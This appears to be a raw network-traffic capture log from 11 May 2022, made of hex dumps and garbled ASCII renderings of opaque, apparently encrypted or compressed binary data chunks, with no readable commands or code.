                                            2022-05-11 11:28:18 UTC94INData Raw: bf 10 d0 c0 16 ef 17 b9 69 13 06 b4 a3 9e 21 e3 91 fb e5 c5 3e be f5 75 01 6b 0f 6b 7c aa d4 34 dc 9a 12 45 73 a0 84 9f ec d4 35 fe d3 95 e9 64 47 0f 66 e4 46 39 47 3d cf d6 36 c0 8d c6 5c 1b 67 7d 96 3f 71 c9 26 1f af 5f c7 84 b1 64 f8 0c 89 3f d4 ae d6 49 30 05 46 a8 f3 09 cd d9 8c f4 fd 9a c1 a8 41 16 8a 61 80 cc fa 7a 0d f6 eb e3 dc 4e 6a 59 6a 5e 59 f6 6a 27 cf 0f 25 88 88 55 45 ae 49 3a 32 78 f3 37 81 e7 3b f0 0c f2 cf b7 e5 a5 83 3f 3b 92 88 b2 18 02 3a 2e aa ee 34 1e d1 3d 2a 40 ec ff 65 39 c7 e5 06 da 52 47 0c fd 74 e5 e5 3f 6f 74 f6 78 a6 d1 b4 68 ca 6c 37 d9 1b 5c 22 40 ee cc e1 f2 24 a9 2f 02 2b 77 ac 4e d6 e8 32 9a 92 52 d5 41 a2 73 4a 2d 6f c6 c4 f0 cc fc 4d c3 1d da f5 84 b3 29 fb 5e dc 2c 10 79 50 ae a4 8e cb e9 a2 c3 95 70 b8 9b 82 15 af
                                            Data Ascii: i!>ukk|4Es5dGfF9G=6\g}?q&_d?I0FAazNjYj^Yj'%UEI:2x7;?;:.4=*@e9RGt?otxhl7\"@$/+wN2RAsJ-oM)^,yPp
                                            2022-05-11 11:28:18 UTC96INData Raw: b5 e1 62 87 8a 28 09 94 22 a4 70 9f d7 87 ff 9d f3 2c ed 73 34 b3 ba 57 0c e7 cf 24 c9 67 33 d1 05 c7 96 88 4e 2b 53 cb db f5 e0 ce e0 a1 f4 54 97 e1 0a 84 be 63 f0 6d c1 9f c7 2b 00 38 5c a6 ca b6 ec b6 42 a2 62 1d ac 8c 47 0e 72 7c 8b c7 63 8c 6a 4b 53 29 79 58 5e 49 92 24 f2 8e 30 e6 fb 4d 43 04 e9 75 64 fe 45 42 bf ba ef 77 6b bd 1b 22 8c 70 3c 48 e1 70 b3 42 fe 5c 98 48 f5 2a e3 99 2c 74 00 e4 86 38 14 10 28 a4 40 b0 df de 53 4f f8 83 b8 c5 3c be ad 1c 86 1b 9c 6c 1e f6 4c c1 1c 98 a2 69 41 0d eb 51 18 77 cf ed 9d d0 4b 06 4b 72 e9 44 28 a4 cb be 8e 33 99 74 57 cf 21 fd 0c cf 7f af 64 64 f9 d4 f6 24 d0 c9 6a 8f e0 ea 40 fc 1a e6 05 03 e5 bd 55 bb c6 1e e1 0c 13 8c 12 f9 16 49 33 0e 42 77 d5 52 c4 51 f8 2f 44 d0 1b 83 57 88 4f b9 4b 45 f2 b3 6d 08 3b
                                            Data Ascii: b("p,s4W$g3N+STcm+8\BbGr|cjKS)yX^I$0MCudEBwk"p<HpB\H*,t8(@SO<lLiAQwKKrD(3tW!dd$j@UI3BwRQ/DWOKEm;
                                            2022-05-11 11:28:18 UTC97INData Raw: 5c 45 a4 85 33 5d a1 fd 35 fd d7 3a e1 0e fa 5b 5a e2 98 92 1e 82 92 a8 b4 31 3b 3b 3f a5 e9 a8 d7 0d 04 56 6a 44 f1 f8 20 e0 cf 0f da 49 58 8a 10 72 ba d0 38 78 a8 f2 a6 3a 83 a5 6e a4 20 2b ca 15 4d 3b 59 fb b3 22 f2 08 bd 37 1b 3e 61 c6 60 d1 32 1c fe 98 7a 76 d8 bd 64 36 66 6e d7 ca eb 23 f5 0e 0d 0a dc e7 80 af 0b c0 77 c2 3f 12 6a 4a 8e 91 70 ca cf 76 c0 eb 7a ae 4d 9b 14 a2 d3 31 b4 7b 5c 70 e0 2c db 0a 0a 03 76 e5 e4 6d f4 87 b1 20 51 00 06 c1 d6 27 59 20 69 a1 50 12 f5 06 8d c4 61 aa e5 de 77 9e 5b 75 88 9b 3c 5e 72 6c 1d 18 5e 84 39 b5 bc c4 27 97 e4 19 04 e6 b8 58 a0 46 36 22 99 37 51 40 83 a6 d1 96 49 f9 29 7c 7e 50 45 11 97 19 b6 2d 23 b6 6f 5c 96 12 d8 e4 92 af d7 21 ff 62 71 d9 34 91 d6 ef 9e f0 5d 01 e2 f4 eb 46 7a 74 4a 8d 99 58 be e2 7e
                                            Data Ascii: \E3]5:[Z1;;?VjD IXr8x:n +M;Y"7>a`2zvd6fn#w?jJpvzM1{\p,vm Q'Y iPaw[u<^rl^9'XF6"7Q@I)|~PE-#o\!bq4]FztJX~
                                            2022-05-11 11:28:18 UTC98INData Raw: 73 b2 94 72 e3 ee 2f cb 32 58 e9 64 58 04 7b ff 4b b2 5e 27 cb 2d 58 eb 85 fe 91 0c 57 78 54 98 62 c3 26 1f a0 68 70 7e b0 4e c1 33 a0 b3 dc b8 46 d6 df 14 43 b8 e6 24 28 c9 9f f8 92 c1 cb b7 44 c0 2c 49 89 f2 49 80 0c f6 f2 9c 85 44 6a 42 73 4f b6 f1 51 b3 97 df 03 89 9b 5b 7c b6 5f 25 78 cd f7 3a ee d5 12 e1 06 e5 5f a8 fa a7 80 17 82 9c 97 b8 ce 3a 17 3c b1 fd 86 c1 db 2c 29 e4 16 fb 65 3e fc d9 18 d7 4b 5a 96 ff 79 8f 20 3f 43 66 ed 1f a3 d8 a5 64 8d 94 32 d9 1b 22 05 53 e4 a9 d1 e9 37 a5 3e 1b 30 6f d5 8f d6 c4 2f 8d 4a 90 7c 45 a3 5d 31 6e 6e cc ea e3 dc f4 28 2e 0d da ff 50 af 09 cc 64 cf 26 1a 7b 51 90 74 8f e7 e0 6b d0 8e 7d be 47 8e 07 40 c1 15 b6 41 51 5e eb d1 08 f6 0c 15 54 fb f7 7e db 9e 4f 69 7c 02 2d 1b ee 56 b6 c0 86 25 0c 7f f7 07 94 e8
                                            Data Ascii: sr/2XdX{K^'-XWxTb&hp~N3FC$(D,IIDjBsOQ[|_%x:_:<,)e>KZy ?Cfd2"S7>0o/J|E]1nn(.Pd&{Qtk}G@AQ^T~Oi|-V%
                                            2022-05-11 11:28:18 UTC99INData Raw: 77 3d cf d0 b1 b5 f6 52 fb bb fa 51 01 f0 1e 93 b7 f2 1f 69 f3 8e 4d 29 0d 38 5b a3 5c a7 f8 a3 57 bb 00 0d 85 98 5d 11 ff 65 14 cb 6b 85 e6 49 5c 36 65 44 d5 a6 96 17 ff 80 bf fd fe 43 46 0d 7b 9a 60 bd 9a 7b 52 4e 18 e7 ad b3 08 22 8e 77 34 de a8 1e 45 48 e6 db 8d 60 a4 2b f0 96 3c 08 c3 e5 97 38 01 c7 f3 80 44 94 e7 3e a7 a3 03 8d b6 b9 32 bc bc 1c e8 e0 9f 40 12 84 57 ea 04 83 c7 34 50 07 fb 73 31 a1 d5 fc 9e ed 65 64 49 6e ef 6c 06 a5 dd b4 01 33 9d 61 4c e7 02 fc 0e c5 cb b4 cb bc f9 cf fc 3f 2e c8 55 b9 f5 ef 79 e3 09 ec d9 12 ef b3 53 56 ca 0a d0 1e 17 a4 ac ec 1b 50 04 d3 43 5b d0 6b f5 40 f3 ab df e2 f5 92 44 82 50 88 52 57 e0 5c 61 3d cf b7 f6 dd 47 aa d6 4a 33 ab d2 5d e7 c5 6c aa 73 72 26 35 c3 7a b8 e1 d0 c8 f7 59 64 24 77 cf 02 ec 9b 25 cb
                                            Data Ascii: w=RQiM)8[\W]ekI\6eDCF{`{RN"w4EH`+<8D>2@W4Ps1edInl3aL?.UySVPC[k@DPRW\a=GJ3]lsr&5zYd$w%
                                            2022-05-11 11:28:18 UTC100INData Raw: 68 4d ef 4d b0 eb dc 01 c2 d5 57 96 ee 72 85 d6 2f 67 64 f4 76 af 01 29 3f a5 2d 37 7b 0c 45 3d 49 68 f2 dc f3 25 0d 2f 02 2e 64 d7 59 4f e8 34 81 b2 6b 7c 45 a8 66 21 69 7a ee 4d f2 dd f2 3a 8b 1b da ff 5b af 04 c2 7b ca 37 0b 6c 8d 0a db 8e cb e2 de d2 8c 6a b3 5c 97 ce a5 d1 3f 62 b0 d8 37 1e 2d f6 ab 0c 18 6a f1 e1 4d 73 94 4f 2b 55 13 2d c4 e4 45 a0 ce 92 80 84 7f f7 0c 98 fe 57 39 f4 ee 7a 8f 4b ac 9f 41 fd 71 63 7a 23 ac 54 bc 35 a9 ac ec b6 84 ee 0c c5 07 80 29 73 6d ce 28 88 32 66 2d 92 ac db 0b 19 e5 d7 7c 7a e0 54 15 b5 f6 a7 2b 3e 25 71 5a 87 14 77 ed ac 91 7b df 00 6a ae 7f 34 91 c9 e4 40 e2 18 2d e2 f4 9a 6c 80 75 65 8a 93 70 b1 e2 7e 01 5f e4 71 c4 85 4b f6 4e d4 7c 9a 06 4c e6 22 06 44 c1 89 56 99 b8 21 2d 10 b2 b8 42 b2 d2 38 fc a1 53 6a
                                            Data Ascii: hMMWr/gdv)?-7{E=Ih%/.dYO4k|Ef!izM:[{7lj\?b7-jMsO+U-EW9zKAqcz#T5)sm(2f-|zT+>%qZw{j4@-luep~_qKN|L"DV!-B8Sj
                                            2022-05-11 11:28:18 UTC101INData Raw: 8f c0 2b 3b 91 f0 8a 2f 83 ee 78 9b fa 4d b0 5b 69 f6 4b 37 d8 41 af 2e 91 89 77 d6 de 26 e3 1f d9 f5 be df a9 eb c8 6a 35 d7 d6 6a a9 78 fb 72 e0 0e f0 45 12 e2 b3 56 be 57 37 c0 10 05 ac ed e8 1b 56 b0 e1 44 44 cd 55 52 51 f4 be eb f9 76 92 50 97 49 b9 d8 48 f2 a2 fc 00 c2 b9 e4 dc 0d a8 d9 4a 3b ae 44 4c f1 d0 66 42 ee 4f 22 3d cd 50 38 f0 da d7 7d b6 62 17 6b c4 87 d4 b5 db a8 ec 89 8e 2a 62 a5 02 fe 2a 3b 86 98 18 a0 e6 d7 c9 04 f1 b3 5b 32 01 40 0e e4 3f bd 3b ee 4f d6 11 0a c8 fe 9f 41 a2 a4 dd 5c 62 7d 83 1e b6 fd d7 6e 47 7a ae d4 08 d7 67 ec f1 23 09 ff 3a 30 f9 81 80 fa 0d 2e 92 30 9a 30 e7 1a 67 b8 da 17 9f 66 79 10 67 85 65 71 28 ef 2e 2f b3 14 5a 52 bb 11 9d e5 dd 0a e5 77 49 ee 7b 6a 3e e8 f5 4b a3 c8 29 d9 cc 77 e7 73 c6 56 0c cb 69 4c 91
                                            Data Ascii: +;/xM[iK7A.w&j5jxrEVW7VDDURQvPIHJ;DLfBO"=P8}bk*b*;[2@?;OA\b}nGzg#:0.00gfygeq(./ZRwI{j>K)wsViL
                                            2022-05-11 11:28:18 UTC103INData Raw: f1 01 36 e7 fd 63 94 65 b2 8c 9b e4 41 62 55 9a 09 54 b6 2c b1 be d3 14 90 fa 0a 02 12 b5 60 ba 74 e3 e5 9d 37 48 47 80 84 40 85 43 ef c4 7a 51 7c 53 14 bf f0 da 0e 29 f3 62 5c 96 12 66 a4 c9 87 16 22 ff 68 ae ee 34 91 c9 59 8d f9 26 13 ea e5 99 53 a0 63 b3 01 c8 58 9f e3 73 1d 90 ed 60 34 96 5b a4 59 ff 5c 93 17 47 e5 33 0e 5c ae fb 56 99 b2 44 3c 38 23 a8 42 b8 4c 34 f4 b9 84 62 2f e0 f5 43 9d 88 5e e4 ce 66 b6 c2 ec 1f 5c 60 9a 6d 53 7b 09 e2 d1 3b 59 e7 48 0d b2 67 f9 5f 56 29 a7 7b 0a b6 c5 bc 26 52 bd 1d 0d 35 79 4e dd 3e ea 7a 23 69 b5 70 32 ad 29 25 39 75 5b 0f 66 19 19 0c b7 7c 96 d2 93 e2 8e ed b4 c6 4a c7 a4 ac c1 15 f4 c6 3e 5d f8 81 c0 9d ec af 7b 54 3d c5 ce d2 ff fa 5e e5 b7 e4 4b 85 47 07 17 1f cf 25 61 51 3e 4c e0 12 f1 d8 e1 56 a7 e8 ba
                                            Data Ascii: 6ceAbUT,`t7HG@CzQ|S)b\f"h4Y&ScXs`4[Y\G3\VD<8#BL4b/C^f\`mS{;YHg_V){&R5yN>z#ip2)%9u[f|J>]{T=^KG%aQ>LV
                                            2022-05-11 11:28:18 UTC104INData Raw: 3e db 92 82 31 74 28 17 e4 cb 1a 8a 60 10 a9 d7 9d c6 10 ea 92 5c aa 07 b9 10 ea 2a 39 39 ed 50 e4 03 8e 27 f8 ac 74 80 4b da 5d 62 eb 8a 42 da 27 c1 f2 5c 76 a8 e1 2c 57 76 e8 eb 41 19 d4 20 3c 24 06 82 f9 12 17 b6 a6 64 31 cb 85 61 ac c1 3e ae e2 67 ee 66 35 76 5d 32 fd 63 4c 5d ec 42 16 ce 8d 8c e8 e8 3d c3 ee 58 74 64 47 1e 99 f5 4b b2 7c 0e df d3 53 c5 a4 7c 57 0c 51 17 19 8e 71 c3 2d 09 24 c0 77 5a a6 b4 5d 1a 88 3f df b4 4f 4c 18 1c 63 8e d0 21 37 d2 a7 f4 b2 4a eb a8 4b 34 3b 62 0e 7d c5 5a 1f f3 fe 88 bd 77 62 42 7d 50 59 f4 ec ac 8b 6c 44 a1 08 58 54 a8 49 b4 ee e2 f3 3f 7f d9 ec d0 47 64 55 a4 3b 94 fb 26 93 96 5e be 36 13 a8 2f a0 f2 b8 25 4f 2e 23 62 4e ea 61 28 39 cf 03 cb 5c 41 93 df b2 48 cc 16 42 72 e5 7a 9f 23 a4 6e a3 20 1e f7 1d 4d 20
                                            Data Ascii: >1t(`\*99P'tK]bB'\v,WvA <$d1a>gf5v]2cL]B=XtdGK|S|WQq-$wZ]?OLc!7JK4;b}ZwbB}PYlDXTI?GdU;&^6/%O.#bNa(9\AHBrz#n M
                                            2022-05-11 11:28:18 UTC105INData Raw: 59 09 f1 fe 5e 95 91 5d d9 c3 7f c9 1f 37 16 d8 0b 8a 9d 44 ad 84 b2 91 3b 58 f6 4c 9a b6 7b 60 49 ce 38 a0 1a 94 bd d2 d0 22 64 2a 93 b6 22 a3 66 2b 3c ea 57 08 d8 11 fe 89 b5 f1 32 e3 62 8d 86 37 af a3 0d ab 6d 9e c4 83 ec 98 e1 3a b4 ab 31 ae ac cb 1d e2 c4 02 51 76 b0 c8 13 5b 73 8d 54 2c d9 d7 e6 95 f6 52 f1 a4 e1 5b f5 f1 23 8b aa f9 f7 6e 51 3e 34 07 04 27 5f b6 d8 10 c7 84 52 b9 fe 05 b3 6d 4d 34 ea 79 a4 c3 62 9a ff 42 a8 37 58 47 d8 d5 b8 3b fc 99 a6 ee f3 52 45 05 8b 65 4d 93 8b 4e bf b9 fc e6 b3 90 3e 2e 98 4e f6 c7 56 15 7e 99 e9 80 18 4f a4 2a e2 98 27 1c df e2 08 85 71 f3 0c 81 62 9a 51 69 77 44 e8 b8 a0 a7 38 b5 bb e8 f4 32 9c 7b 19 8c 4d f1 e4 91 e1 36 6a 0f ca 0e 37 a7 ce ed 88 ca 4e 2c 71 6a e9 44 cd a4 dd af 09 1e 99 61 4a 42 0e fc 0e
                                            Data Ascii: Y^]7D;XL{`I8"d*"f+<W2b7m:1Qv[sT,R[#nQ>4'_RmM4ybB7XG;REeMN>.NV~O*'qbQiwD82{M6j7N,qjDaJB
                                            2022-05-11 11:28:18 UTC107INData Raw: 88 51 47 26 0e aa 68 12 1c b7 42 5f 35 88 3f c1 d1 d0 5c b6 29 42 b9 f1 0b 29 cb bc f5 92 30 c0 a8 4b cb 2d 65 91 dc c1 8b 34 27 ec 8c 96 4e 7b 58 6e a9 49 dc 7e b2 86 04 25 98 90 46 5f 5c 5e 09 6d f4 e5 3d ff d7 a0 d8 cc e1 55 a2 cb 7f 8e 17 95 80 a0 cf 30 3b 3d 41 9d f9 ae 0b c4 20 30 63 44 ea 6e 20 e5 22 06 f6 5e 7b 9b f1 78 85 d5 3e 7e 79 fa 61 49 d8 89 64 b4 25 27 d3 2c 8e 35 43 f7 a8 dc e2 2f b0 31 f4 3b 5c cf 78 c6 ef 5b 4e 9b 7a 76 5a b2 66 2e 6e 7f cd db 08 dc d8 2b 75 09 d8 ff 50 b1 16 c0 78 dc 3d 11 71 a5 87 a6 9c c3 cb b4 c7 84 7b 87 74 90 18 b4 d7 a3 a7 6f 48 75 15 2d e6 02 02 1c 80 e4 d9 7a fa 93 49 30 75 98 05 0e ea 56 a1 f7 5d ac 23 79 ec 2e fc ee 7f ae 99 af 71 9e 4b 69 85 88 e9 5e 63 76 11 f5 55 90 35 c5 87 c5 27 80 fd 01 08 0b b2 74 b8
                                            Data Ascii: QG&hB_5?\)B)0K-e4'N{XnI~%F_\^m=U0;=A 0cDn "^{x>~yaId%',5C/1;\x[NzvZf.n+uPx=q{toHu-zI0uV]#y.qKi^cvU5't
                                            2022-05-11 11:28:18 UTC108INData Raw: a9 4e a2 d6 3c a9 93 46 0e dd 66 87 f0 ba 9e f6 5c 39 6d 74 4e c8 5f 86 37 93 28 ad f7 f4 7a 9a 16 75 62 77 b9 a3 43 bf ba f1 2b b9 b5 33 ff 8a 66 38 a9 0d 1f 69 49 f9 47 99 0f 14 2b e3 99 0d c3 cd e5 80 24 36 fe 0d 81 62 8b ec d5 50 74 25 96 bc ac 57 e7 ad 16 ff 19 8f 60 7b 3c 45 ed 10 b8 17 30 41 0b f7 a5 00 8d ce e7 8d c9 46 25 62 b5 ed 44 2e cb 86 be 29 84 b1 bd 4e cf 27 fb 1f c3 06 1f d9 b6 f3 b1 93 26 d0 c3 6c 8c ea e3 72 ee 16 89 69 02 e5 a6 2c f3 cb 26 cd 1e 1f 9b c4 fb 17 47 20 e1 50 65 d2 bc 31 bf fa b2 f7 f9 e6 92 53 a0 99 98 58 4e d2 5d 60 11 c5 95 f6 db 95 91 17 54 20 be d4 4c f2 de 7e 42 1d ee 24 22 da 1f 1e f2 da dd c7 b6 61 19 71 f2 68 64 b4 db 3e 92 28 93 35 7e 1f 02 fd 24 1f b0 08 a8 a1 e6 41 b7 a5 ec 92 47 88 01 43 00 c2 3f 4e 9a e8 50
                                            Data Ascii: N<Ff\9mtN_7(zubwC+3f8iIG+$6bPt%W`{<E0AF%bD.)N'&lri,&G Pe1SXN]`T L~B$"aqhd>(5~$AGC?NP
                                            2022-05-11 11:28:18 UTC109INData Raw: 27 5d cf b7 db ed 46 ad 45 34 3b 70 c7 72 df 3e a5 e5 fa 71 74 52 74 79 2d 67 5f 2e c5 dc ce c4 24 06 77 d6 ff 5a 41 0c d3 62 ca 3f 15 52 06 8a 8a 8e cb f2 73 dc aa 83 ae 61 c1 1a c5 81 38 b4 6e 5c 77 1a fb 78 52 1d 10 7c cd c3 64 eb 9e 4d 5a 43 03 2d c0 e8 25 0c dd 96 a2 32 7a 84 aa 85 ee 75 80 5b ec 70 94 44 60 1e e8 4e 5c 72 77 23 a6 56 bc 35 9e 12 c6 27 8c e7 11 85 af d6 ad a9 7e c1 5d d2 36 4e 5c 8f 83 c2 88 43 f4 d8 62 6d ed 55 39 b2 eb b2 3c 24 cd 11 58 96 12 79 a4 81 a0 84 31 f0 7d 8c 26 35 bd c9 f8 99 e3 3d 13 e6 eb 9b 57 75 74 74 83 86 69 61 e3 52 5b 83 9f 36 ef 85 4f bf 43 d0 aa 15 5d 4c e6 20 2e 82 c0 f3 5d 9b c3 65 2d 10 b6 ac 31 19 d0 25 f6 b0 57 02 8b f3 fe 5e 63 36 57 f5 cf 7e b0 65 45 ba d0 d7 87 9f e9 af 84 b9 f9 95 5a f4 46 15 a1 e7 47
                                            Data Ascii: ']FE4;pr>qtRty-g_.$wZAb?Rsa8n\wxR|dMZC-%2zu[pD`N\rw#V5'~]6N\CbmU9<$Xy1}&5=WuttiaR[6OC]L .]e-1%W^c6W~eEZFG
                                            2022-05-11 11:28:18 UTC110INData Raw: 64 bc c5 ad d8 bc d1 73 f4 24 da d8 7d a7 3c 99 c6 fd 1a ec f1 ae e7 ac 49 80 65 24 c7 05 0b e3 dc e9 1b 50 26 ef 4e 48 d5 43 df 4f ec 98 0d ee c6 a2 55 f3 10 98 58 4c 81 09 62 11 cf be 94 b9 3d bb de 5f 08 17 da 5d fc d9 3a 46 8f a1 da 3d ea 63 b7 f0 cb d8 fe e2 9b 09 59 d0 05 d7 c6 70 36 fd 84 8e 39 1e 4a bf fb 35 11 8e ca 1a a0 ec 5a d4 1b 36 e1 fe ac 10 4d 39 6b 2b 21 20 c1 fe f7 07 9c c1 96 4e 64 82 22 5a 4f 68 fe d4 0a a6 d8 d0 fd 49 47 4f f3 04 20 65 97 b0 be 18 fc 2d 06 eb cb 1e a6 12 06 b0 98 5c 31 e7 8c 74 c4 fb 3f bf e2 7f 63 cc 1b 74 7c 26 c0 4b 1f a0 13 4f 51 00 8f 8c e8 cb 30 65 98 f4 eb 64 4d 36 c5 f7 4b a9 5d 2f 48 a0 f5 c5 8c cc 7e a1 55 78 41 87 69 5f 55 a2 a8 77 6a a8 1c 60 d0 3f 81 26 48 cb e0 58 36 1e 6b 14 f7 21 3d f0 22 f0 92 da c8
                                            Data Ascii: ds$}<Ie$P&NHCOUXLb=_]:F=cYp69J5Z6M9k+! Nd"ZOhIGO e-\1t?ct|&KOQ0edM6K]/H~UxAi_Uwj`?&HX6k!="
                                            2022-05-11 11:28:18 UTC112INData Raw: a9 7e ca 22 e2 76 4f 58 94 22 66 80 95 f2 01 f0 09 13 54 17 97 7c b4 2d 23 87 4a 5c 96 09 1b a5 93 af 80 3e ec 6d 86 c9 3b 8e 8f 10 9f dc 7c 02 e0 f7 e3 ef 78 74 6f 92 f3 2b 33 e0 7e 01 a9 49 75 ee 8f 63 19 50 d4 76 80 69 82 e7 22 00 37 6a f1 57 93 c6 ea 2e 10 b8 82 f0 b0 d2 2f fe da 6d 70 27 f5 8d e7 49 9b 5f dd 71 75 a6 f9 1e a3 d0 d7 87 d8 8b ac 84 b5 ce 76 4b fb 4c 0d b9 6e d2 b7 c3 14 b5 13 85 b6 d0 d6 60 44 b4 97 b3 33 aa f0 9c af 84 ef 17 7e ae f1 85 a4 fe 2d ee 9c 8c ae 2a 1a 6a a6 a6 70 94 db e6 84 eb 49 38 71 68 19 0b ae cb 17 f4 ec c3 55 76 36 d7 1d 48 88 8d 45 32 d0 e9 20 ef da 73 f3 df a8 43 0b f4 7c 32 aa ff eb 71 b5 fa f7 38 05 2d 7d 1f 54 a7 e3 bf 08 19 03 f3 56 8c 78 0b e1 6d 9f d7 70 d8 08 5b 7a 05 76 4d b1 f3 95 3b f6 81 c6 84 52 50 4c
                                            Data Ascii: ~"vOX"fT|-#J\>m;|xto+3~IucPvi"7jW./mp'I_quvKLn`D3~-*jpI8qhUv6HE2 sC|2q8-}TVxmp[zvM;RPL
                                            2022-05-11 11:28:18 UTC113INData Raw: 50 ff 88 cf d9 f9 82 1e c4 25 dd 58 0d 2c 93 19 af f4 fc e3 53 6c b6 da cb 57 67 e6 7e e6 18 f8 27 06 ea 0c 96 d5 f1 06 b2 ba 15 69 e7 86 74 c4 83 3f bf e2 66 1d 0d c3 18 55 37 c5 38 b3 a2 13 45 39 f6 a5 ba e2 c2 2c 4a 96 1d e8 64 43 35 04 e4 4e b2 53 10 3d d3 59 cd 03 9f 56 0c 55 69 4e 9f 76 e1 c5 0e aa 7d ef d9 b1 62 d2 4e ce 3e de bc 53 56 5c ce 2f 9a f5 21 37 d8 8c f2 92 90 9a 80 7d 3e 2d 6f 39 b7 97 81 0c f2 c6 a3 87 4b 7b 54 51 b4 48 f0 77 25 cc 0f 25 8b 99 22 16 a3 5f 21 63 e0 f3 3c c6 3c 3a f0 0c 6a 0c a4 e3 b6 f1 51 92 96 8c 03 a1 55 46 6b a1 f8 aa 1c d0 a0 76 68 44 fa 74 36 fe d0 2f 22 58 50 9c c6 80 96 de 34 78 fe b4 70 b7 d8 8d 9d a5 2d 3c f1 84 4d 2a 5b f7 a8 cd f4 33 23 6f 0a 3a 71 eb 82 d7 e8 3e 98 9d 6b 77 54 aa 4a 52 90 91 39 c0 8d 9e f5
                                            Data Ascii: P%X,SlWg~'it?fU78E9,JdC5NS=YVUiNv}bN>SV\/!7}>-o9K{TQHw%%"_!c<<:jQUFkvhDt6/"XP4xp-<M*[3#o:q>kwTJR9
                                            2022-05-11 11:28:18 UTC114INData Raw: 2c fa 41 20 e4 42 ce 44 f4 d2 58 ed ea 89 46 80 23 35 5a 48 f8 8a cd 13 c5 ac ef ce e2 0a dc 55 2a 90 75 5f f6 c5 52 fa 70 5e 2f 33 d5 61 b5 7f 83 d7 e1 a5 1e 4d 74 e4 03 63 da 02 34 fd 84 33 1e 20 3b 68 ba 34 1b a2 6e 09 a6 30 c4 82 03 ee 90 36 e6 11 47 15 d7 24 23 2d 9a fb f7 07 9c c8 f1 f3 c9 80 24 d7 74 cf e3 92 13 b8 dc b2 41 54 7d bb da 85 55 67 e6 d9 11 1a f8 2f 06 ea 0c 9c 72 4b 06 b2 b2 e1 75 e6 86 72 08 aa f0 be e6 7f 38 df 1b 74 7c 95 d4 3c d9 b3 16 54 74 22 d4 8c e2 c0 5d b6 ea 58 ed b2 f0 0d 6c e4 46 b4 82 2b d3 c2 54 d6 9e f8 c3 f1 a8 87 5a 88 66 1f 35 08 bb 71 71 91 8f 04 2a ca 77 07 d7 b9 4c 5a 34 6f 7d b8 f5 25 34 5c 1d e9 d2 2a c1 a8 4b 3c 2e 16 2b c8 d2 8a 15 9c 9e 20 94 4e 60 7b d4 55 48 fa 55 04 97 0f 2f 91 f4 97 55 a2 59 56 d9 e7 e2
                                            Data Ascii: ,A BDXF#5ZHU*u_Rp^/3aMtc43 ;h4n06G$#-$tAT}Ug/rKur8t|<Tt"]XlF+TZf5qq*wLZ4o}%4\*K<.+ N`{UHU/UYV
                                            2022-05-11 11:28:18 UTC115INData Raw: f8 ed dd d8 34 93 b8 a3 9f f0 34 17 88 2e 92 3f 45 75 65 88 f7 80 25 8d ae 0a 81 e2 5d ee 96 7b b5 52 fe 7c 9a 06 4a e6 22 17 52 ca d8 4c 99 bf 4c d2 11 9e a8 5a b9 d2 22 ea 5f 53 5d 25 e6 f5 54 4c 83 ab f4 e9 75 8d f1 1d f5 d0 ac ce b6 44 a9 0a 04 fb 3b 58 e7 7c 1f b6 04 f0 49 c2 30 a0 1a 85 a9 d9 86 79 45 b3 8b 44 23 8f 6b 28 3c 91 33 09 5d b9 70 32 87 e5 2b e8 62 8a 9b c9 18 35 09 b0 5a 84 cf 82 e9 82 1b 3b 5d 78 35 a6 d7 88 1c e2 d3 31 da 2c 36 c8 11 20 cf 8c 54 39 41 6d ec cf e2 78 ea af e8 45 1c 0e 0e b5 aa e7 ea 68 d8 9f a5 3b 29 25 42 bb 56 a0 f2 57 49 98 fc 27 ab b8 ef 1a 95 2e 8f d8 6b 99 79 00 56 36 76 35 8a 59 97 3f f8 02 86 f7 fe 52 5f 22 76 64 8a 91 93 43 bf b1 e7 09 a4 af 1f 10 5b 66 3e c6 56 0e 6d 5e 00 57 b9 68 9c 80 e3 93 25 05 da e1 86
                                            Data Ascii: 44.?Eue%]{R|J"RLLZ"_S]%TLuD;X|I0yED#k(<3]p2+b5Z;]x51,6 T9AmxEh;)%BVWI'.kyV6v5Y?R_"vdC[f>Vm^Wh%
                                            2022-05-11 11:28:18 UTC116INData Raw: 93 fd 3a 06 b2 b0 92 30 e7 97 60 b4 ee 25 bf e1 6e ee 66 35 76 6e 3c c5 3f a5 5c 12 69 7b ba 86 8c e5 da d8 f2 c7 5a c2 66 6c fd 6a 8e 17 a2 54 3c f4 f1 5b c4 f1 9a 57 0c 53 52 4b 8e 71 da 16 0c aa 5f 60 80 b1 61 d1 35 99 29 d5 93 57 5a 31 03 bd b8 d9 23 2f d3 8c f5 84 2e c0 84 49 29 26 65 87 d2 2c 81 20 f4 c6 8e bd ad 68 28 24 56 48 f4 57 88 97 0c 58 d4 9a 59 50 88 5f 25 72 fe d2 3c ee 45 38 f0 06 e1 54 a4 f2 b6 a2 00 93 96 82 c7 8e 39 3b 24 aa fa dd b2 d9 2c 29 15 19 fa 65 3b ec f4 c7 d8 58 5a e5 60 72 96 d4 2d 6b 64 f6 76 a6 dd ca af a7 2d 3c b6 62 4c 2a 5b 53 b0 d9 d8 05 a9 2f 0e 55 b2 c1 71 dd 87 f7 89 9a 70 6d 43 72 5a 25 6e 6f ee d6 f6 dd fe 0a fb 1c da f5 8c af 0a c2 75 cd 29 28 b3 85 8a 9b 8a e7 e4 6d c7 eb 20 af 4d 9b c4 bc c6 56 70 68 54 6c 08
                                            Data Ascii: :0`%nf5vn<?\i{ZfljT<[WSRKq_`a5)WZ1#/.I)&e, h($VHWXYP_%r<E8T9;$,)e;XZ`r-kdv-<bL*[S/UqpmCrZ%nou)(m MVphTl
                                            2022-05-11 11:28:18 UTC117INData Raw: cf 00 ad 61 9a f5 5b e9 b2 e5 29 41 61 31 1b ac cb 1d e4 d6 32 44 60 25 cd 2b f0 87 8d 54 3d de df c0 10 f7 7e f9 ad ff 94 06 ef 06 8a ad ff f0 6d c8 77 5a 16 06 3f 46 b5 56 b6 ec b6 41 4a ff 20 a2 9a 5d 1c 60 da bc c5 70 90 e5 5f 56 27 71 56 3c 59 bb 32 8f f9 ac f7 f4 59 55 01 70 64 70 94 8f bd be 9c ef 09 b6 b5 8a 24 93 75 3b c6 47 1a 70 bd ff 7a 93 62 b7 2e f9 80 20 1b d8 e0 9b cc 1f e2 18 86 40 98 dc de 5f 54 70 bd bc aa 39 d3 5a 17 f5 14 b8 72 07 89 44 fc 1f 8b 33 35 6d 08 ca 12 2c 9e cb ed 8a ff 57 d2 4b 42 ec 52 25 bf ce bb 29 9f 9c 77 b4 ce 0d ff 19 dc 6c af c9 b3 e6 d4 08 25 fc cb 52 ba dc ba 8a 00 e5 e1 b6 60 e5 ac 49 82 cb 3d f7 0a 13 b3 12 e8 1b 51 2d f0 52 59 54 f4 cd ce 44 